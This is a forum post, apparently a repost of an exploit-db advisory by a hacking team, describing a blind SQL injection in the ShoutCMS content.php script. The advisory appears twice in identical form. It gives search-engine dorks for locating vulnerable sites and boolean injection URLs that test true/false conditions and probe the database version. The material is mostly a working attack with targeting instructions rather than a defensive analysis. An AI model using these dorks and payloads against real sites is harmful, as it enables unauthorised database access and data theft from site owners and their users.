AtT4CKxT3rR0r1ST
02-02-2010, 12:06 AM
ShoutCMS (content.php) Blind Sql Injection Vulnerability (http://www.exploit-db.com/exploits/11305)
################################################## ##################
.:. Author : Zero Cold [[email protected]]
.:. Team : Sec Attack Team
.:. Home : www.sec-attack.com/vb
.:. Script : Shout! Script
.:. Vendor : http://www.mediashaker.com/index.php
.:. Bug Type : Blind Sql Injection
.:. Dork : [1] "Powered by Shout!"
[2] intitle:"Shout" inurl:"admindex.php"
################################################## ##################
===[ Exploit ]===
www.site.com/content.php?id=54+and+1=1 >>> True
www.site.com/content.php?id=54+and+1=2 >>> False
www.site.com/content.php?id=54+and substring(@@version,1,1)=4 >>> True
www.site.com/content.php?id=54+and substring(@@version,1,1)=5 >>> False
################################################## ##################
Greats T0: HackxBack & AtT4CKxT3rR0r1ST & SAD All My Friend & All Member Sec Attack
################################################## ##################
.:. Author : Zero Cold [[email protected]]
.:. Team : Sec Attack Team
.:. Home : www.sec-attack.com/vb
.:. Script : Shout! Script
.:. Vendor : http://www.mediashaker.com/index.php
.:. Bug Type : Blind Sql Injection
.:. Dork : [1] "Powered by Shout!"
[2] intitle:"Shout" inurl:"admindex.php"
################################################## ##################
===[ Exploit ]===
www.site.com/content.php?id=54+and+1=1 >>> True
www.site.com/content.php?id=54+and+1=2 >>> False
www.site.com/content.php?id=54+and substring(@@version,1,1)=4 >>> True
www.site.com/content.php?id=54+and substring(@@version,1,1)=5 >>> False
################################################## ##################
Greats T0: HackxBack & AtT4CKxT3rR0r1ST & SAD All My Friend & All Member Sec Attack